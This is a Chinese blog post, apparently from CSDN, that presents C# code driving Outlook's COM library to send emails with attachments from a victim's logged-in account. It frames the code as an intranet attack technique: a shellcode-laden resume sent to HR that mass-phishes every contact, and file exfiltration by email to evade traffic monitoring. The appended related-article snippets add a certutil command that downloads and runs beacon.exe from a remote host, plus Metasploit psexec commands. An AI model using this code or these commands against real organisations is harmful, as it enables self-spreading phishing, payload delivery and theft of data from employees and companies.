企业内网渗透横向攻击的一种思路

最新推荐文章于 2024-08-14 19:20:21 发布
原创 最新推荐文章于 2024-08-14 19:20:21 发布 · 2.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Outlook发送邮件 #横向渗透 #企业内网

本文介绍了一种利用Outlook COM库发送邮件的技术,详细展示了如何使用C#调用Outlook COM库发送带附件的邮件,以及如何利用此技术进行大规模钓鱼邮件攻击。文章还探讨了两种潜在的攻击思路,包括通过HR发送带有恶意代码的简历附件,以及通过邮件回传数据绕过流量监控。

以前老东家有个员工不小心点开了Emotet木马,不久后,全体员工收到了一封带有病毒附件的钓鱼邮件,发件人账号正式该员工的邮件账户。

最近在看Black Hat USA 2019大会 第一天的PPT,其中一篇主题《us-19-Joly-Hunting-For-Bugs-Catching-Dragons.pdf》

里面介绍了使用C#调用Outlook的COM库,并以当前登陆邮件账户,给指定邮箱发送邮件。

首先使用vs2013创建一个c# 控制台程序,然后添加引用outlook提供的com对象。

具体操作参考微软官方文档:https://support.microsoft.com/en-hk/help/310258/how-to-use-the-microsoft-outlook-object-library-to-retrieve-a-message

Program.cs代码:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Reflection;
using Outlook = Microsoft.Office.Interop.Outlook;
using Microsoft.Office.Interop.Outlook;
namespace HBDemo
{
    class Program
    {
        static void Main(string[] args)
        {
            var objOutlook = new Outlook.Application();
            var accounts = objOutlook.Session.Accounts;
            MailItem mic = (MailItem)(objOutlook.CreateItem(OlItemType.olMailItem));
            mic.RTFBody = System.IO.File.ReadAllBytes(@"d:\test.rtf");
            mic.Subject = "Important Email";
            mic.Importance = OlImportance.olImportanceHigh;
            mic.Attachments.Add(@"d:\test2.docx", OlAttachmentType.olOLE);
            mic.MessageClass = "IPM.Document.Outlook.File.msg.15";
            mic.To = "xxx@qq.com";
            mic.Send();
        }
    }
}

以上代码运行后,会给指定的xxx@qq.com邮箱发送一封带附件的邮件。

使用以下代码,可以给当前outlook账户下所有联系人发送邮件

   // 给Outlook账户下所有联系人发送邮件
         foreach(Account ac in accounts)
        {
             mic.SendUsingAccount = ac;
        }

利用思路有两种:

1) 给HR发送一封简历附件,打开后自动执行shellcode,调用outlook的com对象,借用hr的邮箱账户给hr的所有联系人群发一封诱惑性标题的钓鱼邮件。

2) 回传数据,发送邮件时可以指定一个附件路径。 目标执行我们的程序后,可以把特定文件通过outlook邮件的方法传到黑客指定的接收邮箱,可以避免一些流量监控软件。

参考资料:
https://docs.microsoft.com/en-us/office/vba/api/outlook.mailitem.sendusingaccount
https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.mailitem

Blackhat USA 2019第一天PPT汇总:
链接:https://pan.baidu.com/s/1mX2Y0x5wQLjvBA9W0_4iTA
提取码:bcg5

内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 2302
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
内网渗透横向移动&NTLM-Relay重放攻击&Responder中继攻击
2301_76227305的博客
08-24 1103
可以看到整个实验下来我是没有抓取hash或者密码的,但是仍可以成功横移的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网安全学习(二)---横向渗透
qi_SJQ_的博客
02-09 4447
横向批量 at&schtasks&impacket 权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透思路,此篇及之后着重学习内网渗透技术。 1.横向渗透—明文传递at&schtasks: 在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。 [at] & [sc
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 9万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
【网络安全】企业内网中的横向移动
HBohan的博客
08-25 1784
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 5234
作者:WHOAMI,转载于freebuf。 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
内网渗透横向移动&RDP&WinRM&WinRS&SPN扫描&Kerberos攻击
2301_76227305的博客
08-14 1642
总的来说RDP基本在现实中不咋用,因为你要去判断连接的账户当前在线不,被发现的风险较大。WinRM的话可能用的比较多,条件是必须为2008以上的系统才行,不过都2024年了,那些2008以下的老古董估计也没谁用了。kerberos攻击简单来说,就是找到RC4加密方式的服务,然后去请求它让本地生成票据,最后使用工具破解得到密码。PS:这个次是实验弄了整整三天,wcnm,各种环境问题。看了一大堆文章也解决不了,实在是不想管啦。以上便是本次横移的知识了。
Windows 内网渗透横向渗透
qq_53742230的博客
07-31 3951
内网渗透横向渗透
内网横向渗透之各种传递攻击
技术超强的网络安全平台
05-06 2510
内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透横向渗透 在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 PsExec 最强大的功能之一是在远程系统和远程支持
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 3047
内网环境下的横向移动总结
内网渗透----欺骗攻击
浅笑996的博客
01-09 1208
Ettercap ettercap ettercap -i eth0 -T -q -M arp:remote /192.168.199.171// /192.168.199.1// driftnet driftnet -i eth0 -a tcpdump tcpdump -i eth0 arp -w 3 当192.168.199.171浏览图片时,会自动将图片下载至目录中: 当192.1...
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 6337
内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
内网横向移动—Wmi&Smb&CrackMapExec&ProxyChains&Impacket
剁椒鱼头没剁椒的博客
06-30 1538
Windows中的wmi是Windows管理工具,它是Windows操作系统中管理数据和操作的基础模块,并且wmic 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,同时该方法不会在目标日志系统留下痕迹。
基于内网渗透攻击分析
qq_34815358的博客
01-10 853
内网攻击造成的后果大致分几类: 1、导致数据泄露 2、业务中断或业务系统不稳定 3、沦为僵尸主机,从而沦为跳板,进而其他业务系统的渗透。   针对内网攻击的手段: 1、口令爆破。利用工具或手动的形式,不断进行登录。这个取决于密码口令的复杂度,以及业务系统有没有做好相对应的容错限制。 2、漏洞利用 3、蠕虫病毒 4、欺骗劫持等等。    ...
Windows 内网渗透之委派攻击
qq_53742230的博客
07-31 1577
委派攻击的三种攻击手法
内网横向——文件传输
qq_55202378的博客
07-27 2388
网络拓扑:攻击机kali IP:192.168.111.0跳板机win7 IP:192.168.111.128,192.168.52.143靶机win server 2008 IP:192.168.52.138。
【内网横移方法与实验】
一纸荒芜的博客
08-05 2871
内网横移技术
内网渗透详细
2401_84466336的博客
04-21 1281
内网渗透涉及对组织内部的封闭网络进行深入探查和攻击。这些网络设计为不对外部公网直接开放,其安全性依赖于隔离策略和内部访问控制。例如,黑客可能通过利用公网漏洞进入公司的内部网络,并在此基础上展开更深层次的网络攻击
内网横向移动方法及思路
最新发布
09-17
内网横向移动是指攻击者在成功入侵一台内网主机后,以此为跳板,进一步渗透到内网其他主机的过程。以下是一些常见的方法及思路: ### 利用NTLM Relay攻击 NTLM Relay攻击一种在内网横向移动中较为有效的方法,可以直接控制域内主机,包括在远程服务器上执行命令、上传exe到远程主机上执行、dump服务器的用户hash等[^2]。 ### 基于WinRM服务的攻击 WinRM指的是Windows远程管理服务,通过远程连接winRM模块可以操作windows命令行,默认监听端口5985(HTTP)& 5986 (HTTPS),在2012以后默认开启。可使用如下命令进行操作: ```plaintext winrs -r:http://10.1.1.1:5985 -u:administrator -p:abc123! "whoami /all" ``` 在实际的内网横向移动中,还可以结合其他操作,如探针、连接执行、上线CS&MSF等。例如: ```plaintext # 探针:cs内置端口扫描5985 # 连接执行 winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "whoami" winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 "whoami" # 上线CS&MSF winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe & beacon.exe" ``` ### 使用Metasploit框架 使用Metasploit框架中的psexec模块进行内网横向移动,示例命令如下: ```plaintext msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp msf6 exploit(windows/smb/psexec) > set smbuser user.txt msf6 exploit(windows/smb/psexec) > set smbpass password.txt msf6 exploit(windows/smb/psexec) > set rhost 192.168.52.0/24 msf6 exploit(windows/smb/psexec) > run ``` ### Kerberoast攻击 Kerberoast攻击也是内网横向移动中可利用的方法之一,可结合其他操作进行使用[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值